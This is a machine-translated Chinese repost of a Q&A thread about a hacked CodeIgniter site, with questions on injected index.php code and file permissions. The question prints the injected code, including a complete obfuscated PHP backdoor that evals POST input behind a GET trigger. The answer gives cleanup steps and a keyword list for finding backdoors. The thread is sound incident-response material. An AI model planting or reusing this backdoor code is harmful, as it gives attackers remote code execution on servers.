116

116

关注
发信
关注(28)粉丝(399)

php - Codeigniter应用程序被黑,代码注入(inject)index.php

我有一个Codeigniter 2.0.2项目,该项目经常被黑客入侵。有两个主要问题:

  • 恶意代码被添加到index.php文件
    • 的开始
  • 流氓文件已添加到服务器

    • 根据主机,没有FTP日志指示这些文件已上传。
  • 由于没有与流氓文件相关的FTP上传日志-这是否意味着它一定是通过站点本身进行的攻击,例如联系人或上载表格?
  • 该网站位于共享主机上-编码它是否位于同一服务器上的网站也遭到黑客入侵,这是否引起了问题?
  • 如果将index.php的文件名更改为其他名称会有所帮助吗?
  • 随着index.php的修改,我应该将其更改为644吗?
  • 我一直在寻找对codeigniter项目建议的权限,但尚未获得。除了上载/日志目录(777),我正在整个站点上进行644的工作-听起来还可以吗?

    • 注入(inject)到index.php文件顶部的代码:
    <?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-
    然后是长的preg_replace语句和长的编码字符串。接下来是第二条语句:
    if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}
    有联系表和用户可以使用CKFinder 2.0.1上载项目的表。要更新它,看看是否可以解决。

    最佳答案

    您可以做几件事:

  • 检查您的日志文件中是否存在对名称奇怪或不熟悉的文件的POST请求,例如.cache_123.php-这些可能是后门脚本,尤其是以点开头的文件名,因此将其隐藏在(常规)文件系统中。
  • 下载完整的实时站点,并在整个站点范围内搜索base64_decodeexecpreg_replacepassthrusystemshell_execevalFilesMan
  • 通过防病毒软件(AVG,Avast等)运行它来检查整个(下载的实时)站点
  • Chmod上载目录775而不是777(如果可能)

    • 09-25 17:42
    Powered by LMLPHP ©2024 116 0.025252